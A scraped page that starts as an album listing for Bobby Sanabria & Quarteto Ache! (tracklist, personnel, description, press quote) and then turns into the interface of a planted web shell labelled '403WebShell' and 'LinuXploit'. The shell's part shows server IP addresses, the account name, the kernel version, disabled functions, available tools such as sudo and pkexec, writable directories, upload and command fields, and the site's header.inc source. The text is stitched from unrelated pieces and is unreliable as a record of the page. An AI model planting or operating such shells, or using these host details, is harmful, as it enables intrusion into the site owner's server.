Bobby Sanabria Bobby Sanabria & Quarteto Ache!

Tracklist

  1. Shaw Nuff
  2. Soleshia
  3. Funky Mr. D
  4. Blue
  5. Childs Walk
  6. Ebb & Flow
  7. El Trane
  8. Aum
  9. Be-Bop

Personnel

Bobby Sanabria – drums, vocals
John di Martino – piano
Boris Kozlov – acoustic bass
Jay Collins – saxophones, flutes

Additional Information

An astute and passionate champion for Afro-Cuban music, Bobby Sanabria is acutely aware of the history and development of jazz from Armstrong to Zawinul. On this recording, he has pared down his vision to a powerhouse quartet, integrating his deep understanding of rhythm into a remarkably flexible unit that can turn on a dime from surging bebop to an infectious Cuban songo, from delicate waltz time swing to a lively mambo or Trinidadian soca!

Press

“…good impression of where Latin jazz has come to…rambunctious, well-schooled, propulsive, slangy, and above all historically literate…”
— The New York Times

403WebShell
403Webshell
Server IP : 23.235.221.107  /  Your IP : 216.73.217.144
Web Server : Apache
System : Linux drums.jazzcorner.com 4.18.0-513.24.1.el8_9.x86_64 #1 SMP Mon Apr 8 11:23:13 EDT 2024 x86_64
User : bsanabri ( 1025)
PHP Version : 8.1.34
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/bsanabri/public_html/archive/m/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/bsanabri/public_html/archive/m/header.inc
<?
function cleanfile($textfile) {
	$text = file_get_contents($textfile);
	$replace = array("content=", "%26", "-------------------------------------------------------------------------------------------------------");
	$with = array("", "&", "<hr />");
	$text = str_replace($replace, $with, $text);
	return nl2br($text);
}
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!--<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">-->
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0" />
<link rel='stylesheet' type='text/css' href='style.css'>
<meta property="og:url" content="http://www.bobbysanabria.com/m" />
<meta property="og:title" content="Bobby Sanabria" />
<meta property="og:image" content="http://www.bobbysanabria.com/images/bobbysanabria_fb.jpg" />
<title>Bobby Sanabria</title>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.6.4/jquery.min.js"></script>
<? if ($page == "Recordings") { ?>
	<script type="text/javascript" src="js/jquery.jplayer.min.js"></script>
	<script type="text/javascript" src="js/jquery.jplayer.inspector.js"></script>
<script type="text/javascript">
$(document).ready(function(){

	// Local copy of jQuery selectors, for performance.
	var	my_jPlayer = $("#jquery_jplayer"),
		my_trackName = $("#jp_container .track-name"),
		my_playState = $("#jp_container .play-state"),
		my_extraPlayInfo = $("#jp_container .extra-play-info");

	// Some options
	var	opt_play_first = false, // If true, will attempt to auto-play the default track on page loads. No effect on mobile devices, like iOS.
		opt_auto_play = true, // If true, when a track is selected, it will auto-play.
		opt_text_playing = "Now playing", // Text when playing
		opt_text_selected = "Track selected"; // Text when not playing

	// A flag to capture the first track
	var first_track = true;

	// Change the time format
	$.jPlayer.timeFormat.padMin = false;
	$.jPlayer.timeFormat.padSec = false;
	$.jPlayer.timeFormat.sepMin = " min ";
	$.jPlayer.timeFormat.sepSec = " sec";

	// Initialize the play state text
	my_playState.text(opt_text_selected);

	// Instance jPlayer
	my_jPlayer.jPlayer({
		ready: function () {
			$("#jp_container .track-default").click();
		},
		timeupdate: function(event) {
			my_extraPlayInfo.text(parseInt(event.jPlayer.status.currentPercentAbsolute, 10) + "%");
		},
		play: function(event) {
			my_playState.text(opt_text_playing);
		},
		pause: function(event) {
			my_playState.text(opt_text_selected);
		},
		ended: function(event) {
			my_playState.text(opt_text_selected);
		},
		swfPath: "js",
		cssSelectorAncestor: "#jp_container",
		supplied: "mp3",
		wmode: "window"
	});

	// Create click handlers for the different tracks
	$("#jp_container .track").click(function(e) {
		my_trackName.text($(this).text());
		my_jPlayer.jPlayer("setMedia", {
			mp3: $(this).attr("href")
		});
		if((opt_play_first && first_track) || (opt_auto_play && !first_track)) {
			my_jPlayer.jPlayer("play");
		}
		first_track = false;
		$(".stopdiv").css("visibility", "hidden");
		$("#stop" + $(this).attr("id")).css("visibility", "visible");
		$(this).blur();
		return false;
	});

	$(".jp-stop").click(function(e) {
		$(".stopdiv").css("visibility", "hidden");
	});

	$("#jplayer_inspector").jPlayerInspector({jPlayer:$("#jquery_jplayer")});
$(".jp-play").click();
});
</script>
<? } ?>
</head>
<body>
<div id="wrapper">
<h1><a href="/m/"><img src="images/header.png" alt="Bobby Sanabria" /></a></h1>
<div id="content">

Youez - 2016 - github.com/yon3zu
LinuXploit